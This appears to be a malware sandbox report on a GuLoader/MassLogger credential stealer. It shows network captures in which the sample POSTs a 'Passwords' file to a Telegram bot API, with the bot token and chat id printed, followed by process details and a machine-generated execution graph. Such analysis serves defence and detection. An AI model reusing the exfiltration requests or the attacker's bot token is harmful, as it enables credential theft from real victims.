37 | 192.168.2.9 | 50046 | 149.154.167.220 | 443 | 1072 | C:\Users\user\Desktop\rXKfKM0T49.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:12:56 UTC | 294 | OUT | POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
    Content-Type: multipart/form-data; boundary================8dd34b0a4c9392c
    Host: api.telegram.org
    Content-Length: 1090
    Connection: Keep-Alive
2025-01-10 22:12:56 UTC | 1090 | OUT | Data Ascii: --===============8dd34b0a4c9392cContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 22:12:56 UTC | 388 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Fri, 10 Jan 2025 22:12:56 GMT
    Content-Type: application/json
    Content-Length: 532
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET, POST, OPTIONS
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 22:12:56 UTC 532 IN Data Ascii: {"ok":true,"result":{"message_id":44819,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736547176,"document":{"file_name":"U


Session ID: 38
Source IP: 192.168.2.9
Source Port: 50048
Destination IP: 149.154.167.220
Destination Port: 443

Timestamp | Bytes transferred | Direction | Data
2025-01-10 22:13:01 UTC 294 OUT POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd319a08d3505f
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
2025-01-10 22:13:01 UTC 1090 OUT Data Ascii: --===============8dd319a08d3505fContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 22:13:01 UTC 388 IN HTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 22:13:01 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 534
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 22:13:01 UTC 534 IN Data Ascii: {"ok":true,"result":{"message_id":44820,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736547181,"document":{"file_name":"U



                                                                                                          Target ID:0
                                                                                                          Start time:17:10:51
                                                                                                          Start date:10/01/2025
                                                                                                          Path:C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\Desktop\rXKfKM0T49.exe"
                                                                                                          Imagebase:0x400000
                                                                                                          File size:1'034'264 bytes
                                                                                                          MD5 hash:948A8F01FCA4EECDDBCB1C20B26A0A53
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1814401893.0000000003E6F000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Reputation:low
                                                                                                          Has exited:true

                                                                                                          Target ID:3
                                                                                                          Start time:17:11:35
                                                                                                          Start date:10/01/2025
                                                                                                          Path:C:\Users\user\Desktop\rXKfKM0T49.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\Desktop\rXKfKM0T49.exe"
                                                                                                          Imagebase:0x400000
                                                                                                          File size:1'034'264 bytes
                                                                                                          MD5 hash:948A8F01FCA4EECDDBCB1C20B26A0A53
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000003.00000002.2649955801.00000000357BB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2649955801.00000000357BB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.2649955801.00000000357BB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000003.00000002.2624047215.00000000022BF000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Reputation:low
                                                                                                          Has exited:false


                                                                                                            Execution Graph

                                                                                                            Execution Coverage:20.3%
                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                            Signature Coverage:20%
                                                                                                            Total number of Nodes:1599
                                                                                                            Total number of Limit Nodes:38
5532->5533 5536 401bcd 5532->5536 5537 40640a 17 API calls 5533->5537 5540 401c0d 5534->5540 5541 401b9b 5534->5541 5535 40640a 17 API calls 5538 4022f1 5535->5538 5545 4022f7 5536->5545 5552 4063e8 lstrcpynW 5536->5552 5537->5540 5544 405a4e MessageBoxIndirectW 5538->5544 5540->5535 5540->5545 5550 4063e8 lstrcpynW 5541->5550 5542 401bdf GlobalFree 5542->5545 5544->5545 5546 401baa 5551 4063e8 lstrcpynW 5546->5551 5548 401bb9 5553 4063e8 lstrcpynW 5548->5553 5550->5546 5551->5548 5552->5542 5553->5545 5254 4024f8 5255 402c81 17 API calls 5254->5255 5256 402502 5255->5256 5257 402c1f 17 API calls 5256->5257 5258 40250b 5257->5258 5259 402533 RegEnumValueW 5258->5259 5260 402527 RegEnumKeyW 5258->5260 5261 40288b 5258->5261 5262 40254f RegCloseKey 5259->5262 5263 402548 5259->5263 5260->5262 5262->5261 5263->5262 5268 40167b 5269 402c41 17 API calls 5268->5269 5270 401682 5269->5270 5271 402c41 17 API calls 5270->5271 5272 40168b 5271->5272 5273 402c41 17 API calls 5272->5273 5274 401694 MoveFileW 5273->5274 5275 4016a0 5274->5275 5276 4016a7 5274->5276 5277 401423 24 API calls 5275->5277 5278 40672b 2 API calls 5276->5278 5280 402250 5276->5280 5277->5280 5279 4016b6 5278->5279 5279->5280 5281 4061ae 36 API calls 5279->5281 5281->5275 5561 401e7d 5562 402c41 17 API calls 5561->5562 5563 401e83 5562->5563 5564 402c41 17 API calls 5563->5564 5565 401e8c 5564->5565 5566 402c41 17 API calls 5565->5566 5567 401e95 5566->5567 5568 402c41 17 API calls 5567->5568 5569 401e9e 5568->5569 5570 401423 24 API calls 5569->5570 5571 401ea5 5570->5571 5578 405a14 ShellExecuteExW 5571->5578 5573 401ee7 5576 40288b 5573->5576 5579 406873 WaitForSingleObject 5573->5579 5575 401f01 CloseHandle 5575->5576 5578->5573 5580 40688d 5579->5580 5581 40689f GetExitCodeProcess 5580->5581 5582 4067fe 2 API calls 5580->5582 5581->5575 5583 406894 WaitForSingleObject 5582->5583 5583->5580 5584 4019ff 5585 402c41 17 API calls 5584->5585 5586 401a06 5585->5586 5587 402c41 17 API calls 5586->5587 
5588 401a0f 5587->5588 5589 401a16 lstrcmpiW 5588->5589 5590 401a28 lstrcmpW 5588->5590 5591 401a1c 5589->5591 5590->5591 5592 401000 5593 401037 BeginPaint GetClientRect 5592->5593 5594 40100c DefWindowProcW 5592->5594 5596 4010f3 5593->5596 5597 401179 5594->5597 5598 401073 CreateBrushIndirect FillRect DeleteObject 5596->5598 5599 4010fc 5596->5599 5598->5596 5600 401102 CreateFontIndirectW 5599->5600 5601 401167 EndPaint 5599->5601 5600->5601 5602 401112 6 API calls 5600->5602 5601->5597 5602->5601 5603 401503 5604 40150b 5603->5604 5606 40151e 5603->5606 5605 402c1f 17 API calls 5604->5605 5605->5606 4527 402484 4538 402c81 4527->4538 4530 402c41 17 API calls 4531 402497 4530->4531 4532 4024a2 RegQueryValueExW 4531->4532 4536 40288b 4531->4536 4533 4024c8 RegCloseKey 4532->4533 4534 4024c2 4532->4534 4533->4536 4534->4533 4543 40632f wsprintfW 4534->4543 4539 402c41 17 API calls 4538->4539 4540 402c98 4539->4540 4541 406255 RegOpenKeyExW 4540->4541 4542 40248e 4541->4542 4542->4530 4543->4533 5607 402104 5608 402c41 17 API calls 5607->5608 5609 40210b 5608->5609 5610 402c41 17 API calls 5609->5610 5611 402115 5610->5611 5612 402c41 17 API calls 5611->5612 5613 40211f 5612->5613 5614 402c41 17 API calls 5613->5614 5615 402129 5614->5615 5616 402c41 17 API calls 5615->5616 5618 402133 5616->5618 5617 402172 CoCreateInstance 5622 402191 5617->5622 5618->5617 5619 402c41 17 API calls 5618->5619 5619->5617 5620 401423 24 API calls 5621 402250 5620->5621 5622->5620 5622->5621 4787 403e86 4788 403fd9 4787->4788 4789 403e9e 4787->4789 4791 403fea GetDlgItem GetDlgItem 4788->4791 4809 40402a 4788->4809 4789->4788 4790 403eaa 4789->4790 4792 403eb5 SetWindowPos 4790->4792 4793 403ec8 4790->4793 4794 40435f 18 API calls 4791->4794 4792->4793 4797 403ee5 4793->4797 4798 403ecd ShowWindow 4793->4798 4799 404014 SetClassLongW 4794->4799 4795 404084 4796 4043ab SendMessageW 4795->4796 4801 403fd4 4795->4801 4825 404096 4796->4825 4802 403f07 4797->4802 4803 403eed 
DestroyWindow 4797->4803 4798->4797 4804 40140b 2 API calls 4799->4804 4800 401389 2 API calls 4807 40405c 4800->4807 4805 403f0c SetWindowLongW 4802->4805 4806 403f1d 4802->4806 4808 404309 4803->4808 4804->4809 4805->4801 4810 403fc6 4806->4810 4811 403f29 GetDlgItem 4806->4811 4807->4795 4812 404060 SendMessageW 4807->4812 4808->4801 4818 404319 ShowWindow 4808->4818 4809->4795 4809->4800 4868 4043c6 4810->4868 4815 403f59 4811->4815 4816 403f3c SendMessageW IsWindowEnabled 4811->4816 4812->4801 4813 40140b 2 API calls 4813->4825 4814 4042ea DestroyWindow EndDialog 4814->4808 4820 403f66 4815->4820 4822 403fad SendMessageW 4815->4822 4823 403f79 4815->4823 4832 403f5e 4815->4832 4816->4801 4816->4815 4818->4801 4819 40640a 17 API calls 4819->4825 4820->4822 4820->4832 4822->4810 4826 403f81 4823->4826 4827 403f96 4823->4827 4824 403f94 4824->4810 4825->4801 4825->4813 4825->4814 4825->4819 4828 40435f 18 API calls 4825->4828 4849 40422a DestroyWindow 4825->4849 4859 40435f 4825->4859 4830 40140b 2 API calls 4826->4830 4829 40140b 2 API calls 4827->4829 4828->4825 4831 403f9d 4829->4831 4830->4832 4831->4810 4831->4832 4865 404338 4832->4865 4834 404111 GetDlgItem 4835 404126 4834->4835 4836 40412e ShowWindow KiUserCallbackDispatcher 4834->4836 4835->4836 4862 404381 EnableWindow 4836->4862 4838 404158 EnableWindow 4843 40416c 4838->4843 4839 404171 GetSystemMenu EnableMenuItem SendMessageW 4840 4041a1 SendMessageW 4839->4840 4839->4843 4840->4843 4842 403e67 18 API calls 4842->4843 4843->4839 4843->4842 4863 404394 SendMessageW 4843->4863 4864 4063e8 lstrcpynW 4843->4864 4845 4041d0 lstrlenW 4846 40640a 17 API calls 4845->4846 4847 4041e6 SetWindowTextW 4846->4847 4848 401389 2 API calls 4847->4848 4848->4825 4849->4808 4850 404244 CreateDialogParamW 4849->4850 4850->4808 4851 404277 4850->4851 4852 40435f 18 API calls 4851->4852 4853 404282 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4852->4853 4854 401389 2 API calls 4853->4854 4855 4042c8 4854->4855 
4855->4801 4856 4042d0 ShowWindow 4855->4856 4857 4043ab SendMessageW 4856->4857 4858 4042e8 4857->4858 4858->4808 4860 40640a 17 API calls 4859->4860 4861 40436a SetDlgItemTextW 4860->4861 4861->4834 4862->4838 4863->4843 4864->4845 4866 404345 SendMessageW 4865->4866 4867 40433f 4865->4867 4866->4824 4867->4866 4869 404489 4868->4869 4870 4043de GetWindowLongW 4868->4870 4869->4801 4870->4869 4871 4043f3 4870->4871 4871->4869 4872 404420 GetSysColor 4871->4872 4873 404423 4871->4873 4872->4873 4874 404433 SetBkMode 4873->4874 4875 404429 SetTextColor 4873->4875 4876 404451 4874->4876 4877 40444b GetSysColor 4874->4877 4875->4874 4878 404462 4876->4878 4879 404458 SetBkColor 4876->4879 4877->4876 4878->4869 4880 404475 DeleteObject 4878->4880 4881 40447c CreateBrushIndirect 4878->4881 4879->4878 4880->4881 4881->4869 5623 401f06 5624 402c41 17 API calls 5623->5624 5625 401f0c 5624->5625 5626 405450 24 API calls 5625->5626 5627 401f16 5626->5627 5628 4059d1 2 API calls 5627->5628 5629 401f1c 5628->5629 5630 401f3f CloseHandle 5629->5630 5631 406873 5 API calls 5629->5631 5634 40288b 5629->5634 5630->5634 5633 401f31 5631->5633 5633->5630 5636 40632f wsprintfW 5633->5636 5636->5630 5637 404809 5638 404819 5637->5638 5639 40483f 5637->5639 5640 40435f 18 API calls 5638->5640 5641 4043c6 8 API calls 5639->5641 5642 404826 SetDlgItemTextW 5640->5642 5643 40484b 5641->5643 5642->5639 5644 40190c 5645 401943 5644->5645 5646 402c41 17 API calls 5645->5646 5647 401948 5646->5647 5648 405afa 67 API calls 5647->5648 5649 401951 5648->5649 5650 40230c 5651 402314 5650->5651 5652 40231a 5650->5652 5653 402c41 17 API calls 5651->5653 5654 402c41 17 API calls 5652->5654 5656 402328 5652->5656 5653->5652 5654->5656 5655 402336 5657 402c41 17 API calls 5655->5657 5656->5655 5658 402c41 17 API calls 5656->5658 5659 40233f WritePrivateProfileStringW 5657->5659 5658->5655 5660 401f8c 5661 402c41 17 API calls 5660->5661 5662 401f93 5661->5662 5663 4067c2 5 API calls 5662->5663 5664 
401fa2 5663->5664 5665 401fbe GlobalAlloc 5664->5665 5668 402026 5664->5668 5666 401fd2 5665->5666 5665->5668 5667 4067c2 5 API calls 5666->5667 5669 401fd9 5667->5669 5670 4067c2 5 API calls 5669->5670 5671 401fe3 5670->5671 5671->5668 5675 40632f wsprintfW 5671->5675 5673 402018 5676 40632f wsprintfW 5673->5676 5675->5673 5676->5668 4983 40238e 4984 4023c1 4983->4984 4985 402396 4983->4985 4987 402c41 17 API calls 4984->4987 4986 402c81 17 API calls 4985->4986 4988 40239d 4986->4988 4989 4023c8 4987->4989 4990 4023a7 4988->4990 4992 4023d5 4988->4992 4995 402cff 4989->4995 4993 402c41 17 API calls 4990->4993 4994 4023ae RegDeleteValueW RegCloseKey 4993->4994 4994->4992 4996 402d13 4995->4996 4997 402d0c 4995->4997 4996->4997 4999 402d44 4996->4999 4997->4992 5000 406255 RegOpenKeyExW 4999->5000 5001 402d72 5000->5001 5002 402dec 5001->5002 5006 402d76 5001->5006 5002->4997 5003 402d98 RegEnumKeyW 5004 402daf RegCloseKey 5003->5004 5003->5006 5007 4067c2 5 API calls 5004->5007 5005 402dd0 RegCloseKey 5005->5002 5006->5003 5006->5004 5006->5005 5008 402d44 6 API calls 5006->5008 5009 402dbf 5007->5009 5008->5006 5010 402de0 RegDeleteKeyW 5009->5010 5011 402dc3 5009->5011 5010->5002 5011->5002 5677 40190f 5678 402c41 17 API calls 5677->5678 5679 401916 5678->5679 5680 405a4e MessageBoxIndirectW 5679->5680 5681 40191f 5680->5681 5682 40558f 5683 4055b0 GetDlgItem GetDlgItem GetDlgItem 5682->5683 5684 405739 5682->5684 5727 404394 SendMessageW 5683->5727 5686 405742 GetDlgItem CreateThread CloseHandle 5684->5686 5687 40576a 5684->5687 5686->5687 5689 405795 5687->5689 5691 405781 ShowWindow ShowWindow 5687->5691 5692 4057ba 5687->5692 5688 405620 5697 405627 GetClientRect GetSystemMetrics SendMessageW SendMessageW 5688->5697 5690 4057f5 5689->5690 5694 4057a9 5689->5694 5695 4057cf ShowWindow 5689->5695 5690->5692 5704 405803 SendMessageW 5690->5704 5729 404394 SendMessageW 5691->5729 5696 4043c6 8 API calls 5692->5696 5698 404338 SendMessageW 5694->5698 5700 4057e1 
5695->5700 5701 4057ef 5695->5701 5699 4057c8 5696->5699 5702 405695 5697->5702 5703 405679 SendMessageW SendMessageW 5697->5703 5698->5692 5708 405450 24 API calls 5700->5708 5709 404338 SendMessageW 5701->5709 5705 4056a8 5702->5705 5706 40569a SendMessageW 5702->5706 5703->5702 5704->5699 5707 40581c CreatePopupMenu 5704->5707 5711 40435f 18 API calls 5705->5711 5706->5705 5710 40640a 17 API calls 5707->5710 5708->5701 5709->5690 5712 40582c AppendMenuW 5710->5712 5713 4056b8 5711->5713 5714 405849 GetWindowRect 5712->5714 5715 40585c TrackPopupMenu 5712->5715 5716 4056c1 ShowWindow 5713->5716 5717 4056f5 GetDlgItem SendMessageW 5713->5717 5714->5715 5715->5699 5718 405877 5715->5718 5719 4056e4 5716->5719 5720 4056d7 ShowWindow 5716->5720 5717->5699 5721 40571c SendMessageW SendMessageW 5717->5721 5722 405893 SendMessageW 5718->5722 5728 404394 SendMessageW 5719->5728 5720->5719 5721->5699 5722->5722 5723 4058b0 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5722->5723 5725 4058d5 SendMessageW 5723->5725 5725->5725 5726 4058fe GlobalUnlock SetClipboardData CloseClipboard 5725->5726 5726->5699 5727->5688 5728->5717 5729->5689 5730 700918d9 5731 700918fc 5730->5731 5732 70091931 GlobalFree 5731->5732 5733 70091943 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5731->5733 5732->5733 5734 70091272 2 API calls 5733->5734 5735 70091ace GlobalFree GlobalFree 5734->5735 5736 70091058 5738 70091074 5736->5738 5737 700910dd 5738->5737 5739 70091516 GlobalFree 5738->5739 5740 70091092 5738->5740 5739->5740 5741 70091516 GlobalFree 5740->5741 5742 700910a2 5741->5742 5743 700910a9 GlobalSize 5742->5743 5744 700910b2 5742->5744 5743->5744 5745 700910c7 5744->5745 5746 700910b6 GlobalAlloc 5744->5746 5748 700910d2 GlobalFree 5745->5748 5747 7009153d 3 API calls 5746->5747 5747->5745 5748->5737 5749 401491 5750 405450 24 API calls 5749->5750 5751 401498 5750->5751 5759 401d14 5760 402c1f 17 API calls 5759->5760 5761 401d1b 5760->5761 5762 402c1f 17 API calls 
5761->5762 5763 401d27 GetDlgItem 5762->5763 5764 402592 5763->5764 5765 404495 lstrcpynW lstrlenW 5766 403a96 5767 403aa1 5766->5767 5768 403aa5 5767->5768 5769 403aa8 GlobalAlloc 5767->5769 5769->5768 5770 402598 5771 4025c7 5770->5771 5772 4025ac 5770->5772 5774 4025fb 5771->5774 5775 4025cc 5771->5775 5773 402c1f 17 API calls 5772->5773 5782 4025b3 5773->5782 5777 402c41 17 API calls 5774->5777 5776 402c41 17 API calls 5775->5776 5778 4025d3 WideCharToMultiByte lstrlenA 5776->5778 5779 402602 lstrlenW 5777->5779 5778->5782 5779->5782 5780 40262f 5781 402645 5780->5781 5783 405f90 WriteFile 5780->5783 5782->5780 5782->5781 5784 405fbf 5 API calls 5782->5784 5783->5781 5784->5780 5785 700916d4 5786 70091703 5785->5786 5787 70091b5f 22 API calls 5786->5787 5788 7009170a 5787->5788 5789 7009171d 5788->5789 5790 70091711 5788->5790 5792 70091744 5789->5792 5793 70091727 5789->5793 5791 70091272 2 API calls 5790->5791 5796 7009171b 5791->5796 5794 7009174a 5792->5794 5795 7009176e 5792->5795 5797 7009153d 3 API calls 5793->5797 5798 700915b4 3 API calls 5794->5798 5799 7009153d 3 API calls 5795->5799 5800 7009172c 5797->5800 5802 7009174f 5798->5802 5799->5796 5801 700915b4 3 API calls 5800->5801 5803 70091732 5801->5803 5804 70091272 2 API calls 5802->5804 5805 70091272 2 API calls 5803->5805 5806 70091755 GlobalFree 5804->5806 5807 70091738 GlobalFree 5805->5807 5806->5796 5808 70091769 GlobalFree 5806->5808 5807->5796 5808->5796 5809 70092c57 5810 70092c6f 5809->5810 5811 7009158f 2 API calls 5810->5811 5812 70092c8a 5811->5812 5813 40451e 5814 404536 5813->5814 5820 404650 5813->5820 5821 40435f 18 API calls 5814->5821 5815 4046ba 5816 404784 5815->5816 5817 4046c4 GetDlgItem 5815->5817 5822 4043c6 8 API calls 5816->5822 5818 404745 5817->5818 5819 4046de 5817->5819 5818->5816 5826 404757 5818->5826 5819->5818 5825 404704 SendMessageW LoadCursorW SetCursor 5819->5825 5820->5815 5820->5816 5823 40468b GetDlgItem SendMessageW 5820->5823 5824 40459d 5821->5824 5837 
40477f 5822->5837 5846 404381 EnableWindow 5823->5846 5828 40435f 18 API calls 5824->5828 5847 4047cd 5825->5847 5831 40476d 5826->5831 5832 40475d SendMessageW 5826->5832 5829 4045aa CheckDlgButton 5828->5829 5844 404381 EnableWindow 5829->5844 5836 404773 SendMessageW 5831->5836 5831->5837 5832->5831 5833 4046b5 5838 4047a9 SendMessageW 5833->5838 5836->5837 5838->5815 5839 4045c8 GetDlgItem 5845 404394 SendMessageW 5839->5845 5841 4045de SendMessageW 5842 404604 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5841->5842 5843 4045fb GetSysColor 5841->5843 5842->5837 5843->5842 5844->5839 5845->5841 5846->5833 5850 405a14 ShellExecuteExW 5847->5850 5849 404733 LoadCursorW SetCursor 5849->5818 5850->5849 5851 40149e 5852 4014ac PostQuitMessage 5851->5852 5853 4022f7 5851->5853 5852->5853 5854 401c1f 5855 402c1f 17 API calls 5854->5855 5856 401c26 5855->5856 5857 402c1f 17 API calls 5856->5857 5858 401c33 5857->5858 5859 401c48 5858->5859 5860 402c41 17 API calls 5858->5860 5863 402c41 17 API calls 5859->5863 5866 401c58 5859->5866 5860->5859 5861 401c63 5864 402c1f 17 API calls 5861->5864 5862 401caf 5865 402c41 17 API calls 5862->5865 5863->5866 5867 401c68 5864->5867 5868 401cb4 5865->5868 5866->5861 5866->5862 5869 402c1f 17 API calls 5867->5869 5870 402c41 17 API calls 5868->5870 5871 401c74 5869->5871 5872 401cbd FindWindowExW 5870->5872 5873 401c81 SendMessageTimeoutW 5871->5873 5874 401c9f SendMessageW 5871->5874 5875 401cdf 5872->5875 5873->5875 5874->5875 5876 402aa0 SendMessageW 5877 402ac5 5876->5877 5878 402aba InvalidateRect 5876->5878 5878->5877 5879 402821 5880 402827 5879->5880 5881 402ac5 5880->5881 5882 40282f FindClose 5880->5882 5882->5881 5883 4015a3 5884 402c41 17 API calls 5883->5884 5885 4015aa SetFileAttributesW 5884->5885 5886 4015bc 5885->5886 5887 7009166d 5888 70091516 GlobalFree 5887->5888 5890 70091685 5888->5890 5889 700916cb GlobalFree 5890->5889 5891 700916a0 5890->5891 5892 700916b7 VirtualFree 5890->5892 5891->5889 
5892->5889 4544 4034a5 SetErrorMode GetVersion 4545 4034e4 4544->4545 4546 4034ea 4544->4546 4547 4067c2 5 API calls 4545->4547 4548 406752 3 API calls 4546->4548 4547->4546 4549 403500 lstrlenA 4548->4549 4549->4546 4550 403510 4549->4550 4551 4067c2 5 API calls 4550->4551 4552 403517 4551->4552 4553 4067c2 5 API calls 4552->4553 4554 40351e 4553->4554 4555 4067c2 5 API calls 4554->4555 4556 40352a #17 OleInitialize SHGetFileInfoW 4555->4556 4634 4063e8 lstrcpynW 4556->4634 4559 403576 GetCommandLineW 4635 4063e8 lstrcpynW 4559->4635 4561 403588 4562 405cea CharNextW 4561->4562 4563 4035ad CharNextW 4562->4563 4564 4036d7 GetTempPathW 4563->4564 4571 4035c6 4563->4571 4636 403474 4564->4636 4566 4036ef 4567 4036f3 GetWindowsDirectoryW lstrcatW 4566->4567 4568 403749 DeleteFileW 4566->4568 4572 403474 12 API calls 4567->4572 4646 402f30 GetTickCount GetModuleFileNameW 4568->4646 4569 405cea CharNextW 4569->4571 4571->4569 4576 4036c2 4571->4576 4578 4036c0 4571->4578 4574 40370f 4572->4574 4573 40375d 4579 403800 4573->4579 4583 405cea CharNextW 4573->4583 4629 403810 4573->4629 4574->4568 4575 403713 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4574->4575 4577 403474 12 API calls 4575->4577 4732 4063e8 lstrcpynW 4576->4732 4581 403741 4577->4581 4578->4564 4676 403ad8 4579->4676 4581->4568 4581->4629 4600 40377c 4583->4600 4586 40394a 4588 403952 GetCurrentProcess OpenProcessToken 4586->4588 4589 4039ce ExitProcess 4586->4589 4587 40382a 4744 405a4e 4587->4744 4594 40396a LookupPrivilegeValueW AdjustTokenPrivileges 4588->4594 4595 40399e 4588->4595 4591 403840 4598 4059b9 5 API calls 4591->4598 4592 4037da 4597 405dc5 18 API calls 4592->4597 4594->4595 4599 4067c2 5 API calls 4595->4599 4601 4037e6 4597->4601 4602 403845 lstrcatW 4598->4602 4603 4039a5 4599->4603 4600->4591 4600->4592 4601->4629 4733 4063e8 lstrcpynW 4601->4733 4604 403861 lstrcatW lstrcmpiW 4602->4604 4605 403856 lstrcatW 4602->4605 4606 4039ba ExitWindowsEx 4603->4606 
4609 4039c7 4603->4609 4608 40387d 4604->4608 4604->4629 4605->4604 4606->4589 4606->4609 4611 403882 4608->4611 4612 403889 4608->4612 4613 40140b 2 API calls 4609->4613 4610 4037f5 4734 4063e8 lstrcpynW 4610->4734 4615 40591f 4 API calls 4611->4615 4616 40599c 2 API calls 4612->4616 4613->4589 4617 403887 4615->4617 4618 40388e SetCurrentDirectoryW 4616->4618 4617->4618 4619 4038a9 4618->4619 4620 40389e 4618->4620 4749 4063e8 lstrcpynW 4619->4749 4748 4063e8 lstrcpynW 4620->4748 4623 40640a 17 API calls 4624 4038e8 DeleteFileW 4623->4624 4625 4038f5 CopyFileW 4624->4625 4631 4038b7 4624->4631 4625->4631 4626 40393e 4627 4061ae 36 API calls 4626->4627 4627->4629 4628 4061ae 36 API calls 4628->4631 4735 4039e6 4629->4735 4630 40640a 17 API calls 4630->4631 4631->4623 4631->4626 4631->4628 4631->4630 4633 403929 CloseHandle 4631->4633 4750 4059d1 CreateProcessW 4631->4750 4633->4631 4634->4559 4635->4561 4637 40667c 5 API calls 4636->4637 4639 403480 4637->4639 4638 40348a 4638->4566 4639->4638 4640 405cbd 3 API calls 4639->4640 4641 403492 4640->4641 4642 40599c 2 API calls 4641->4642 4643 403498 4642->4643 4753 405f0d 4643->4753 4757 405ede GetFileAttributesW CreateFileW 4646->4757 4648 402f73 4675 402f80 4648->4675 4758 4063e8 lstrcpynW 4648->4758 4650 402f96 4651 405d09 2 API calls 4650->4651 4652 402f9c 4651->4652 4759 4063e8 lstrcpynW 4652->4759 4654 402fa7 GetFileSize 4655 4030a8 4654->4655 4665 402fbe 4654->4665 4656 402e8e 32 API calls 4655->4656 4658 4030af 4656->4658 4657 403447 ReadFile 4657->4665 4660 4030eb GlobalAlloc 4658->4660 4658->4675 4761 40345d SetFilePointer 4658->4761 4659 403143 4663 402e8e 32 API calls 4659->4663 4662 403102 4660->4662 4668 405f0d 2 API calls 4662->4668 4663->4675 4664 4030cc 4666 403447 ReadFile 4664->4666 4665->4655 4665->4657 4665->4659 4667 402e8e 32 API calls 4665->4667 4665->4675 4669 4030d7 4666->4669 4667->4665 4670 403113 CreateFileW 4668->4670 4669->4660 4669->4675 4671 40314d 4670->4671 4670->4675 4760 40345d 
SetFilePointer 4671->4760 4673 40315b 4674 4031d6 44 API calls 4673->4674 4674->4675 4675->4573 4675->4675 4677 4067c2 5 API calls 4676->4677 4678 403aec 4677->4678 4679 403af2 4678->4679 4680 403b04 4678->4680 4770 40632f wsprintfW 4679->4770 4681 4062b6 3 API calls 4680->4681 4682 403b34 4681->4682 4684 403b53 lstrcatW 4682->4684 4685 4062b6 3 API calls 4682->4685 4686 403b02 4684->4686 4685->4684 4762 403dae 4686->4762 4689 405dc5 18 API calls 4690 403b85 4689->4690 4691 403c19 4690->4691 4693 4062b6 3 API calls 4690->4693 4692 405dc5 18 API calls 4691->4692 4694 403c1f 4692->4694 4695 403bb7 4693->4695 4696 403c2f LoadImageW 4694->4696 4697 40640a 17 API calls 4694->4697 4695->4691 4702 403bd8 lstrlenW 4695->4702 4706 405cea CharNextW 4695->4706 4698 403cd5 4696->4698 4699 403c56 RegisterClassW 4696->4699 4697->4696 4701 40140b 2 API calls 4698->4701 4700 403c8c SystemParametersInfoW CreateWindowExW 4699->4700 4731 403cdf 4699->4731 4700->4698 4705 403cdb 4701->4705 4703 403be6 lstrcmpiW 4702->4703 4704 403c0c 4702->4704 4703->4704 4707 403bf6 GetFileAttributesW 4703->4707 4708 405cbd 3 API calls 4704->4708 4711 403dae 18 API calls 4705->4711 4705->4731 4709 403bd5 4706->4709 4710 403c02 4707->4710 4712 403c12 4708->4712 4709->4702 4710->4704 4713 405d09 2 API calls 4710->4713 4714 403cec 4711->4714 4771 4063e8 lstrcpynW 4712->4771 4713->4704 4716 403cf8 ShowWindow 4714->4716 4717 403d7b 4714->4717 4719 406752 3 API calls 4716->4719 4772 405523 OleInitialize 4717->4772 4721 403d10 4719->4721 4720 403d81 4722 403d85 4720->4722 4723 403d9d 4720->4723 4724 403d1e GetClassInfoW 4721->4724 4726 406752 3 API calls 4721->4726 4730 40140b 2 API calls 4722->4730 4722->4731 4725 40140b 2 API calls 